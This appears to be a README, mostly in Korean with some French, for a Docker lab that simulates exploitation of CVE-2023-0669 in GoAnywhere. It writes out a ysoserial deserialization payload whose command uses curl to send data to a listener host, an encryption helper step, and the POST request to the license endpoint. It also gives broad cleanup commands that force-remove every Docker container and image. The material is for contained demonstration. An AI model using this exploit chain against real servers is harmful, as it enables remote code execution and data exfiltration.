
CVE-2023-0669 시뮬레이션 환경으로, Docker 기반의 공격자, 취약한 서버, 리스너 컨테이너로 구성됩니다. 역직렬화 익스플로잇 생성, 페이로드 암호화, 데이터 유출을 시연합니다.
cve-2023-0669-simulation/ ├── docker-compose.yml ├── attacker/ │ ├── Dockerfile │ └── CVE_2023_0669_helper.java ├── vulnerable/ │ ├── Dockerfile │ └── VulnerableServer.java ├── listener/ │ ├── Dockerfile │ └── server.py └── received/ ← créé automatiquement (exfiltration)
docker-compose up --build
docker compose up 중 KeyError: 'ContainerConfig' 오류이 프로젝트는 다음을 필요로 합니다:
docker compose down --remove-orphans
docker rm -f $(docker ps -aq)
docker rmi -f $(docker images -q)
그런 다음 깨끗하게 다시 빌드하세요:
docker compose build --no-cache
docker compose up
docker exec -it attacker bash
java -jar ysoserial-all.jar CommonsCollections6 'curl -s http://listener:8080/receive -d "PWNED-CVE-2023-0669-simulation-$(date)"' > payload.ser
java CVE_2023_0669_helper payload.ser 1
curl -X POST http://vulnerable:8001/goanywhere/lic/accept
-d "encryptedLicenseResponseData=LA_CHAÎNE_BASE64_ICI"
-d "acceptLicense=true"
리스너 로그(또는 PC의 ./received 폴더)에서 다음을 볼 수 있습니다:
PWNED ! 수신됨 42 바이트 → PWNED-CVE-2023-0669-simulation-Sat 06 Dec 2025...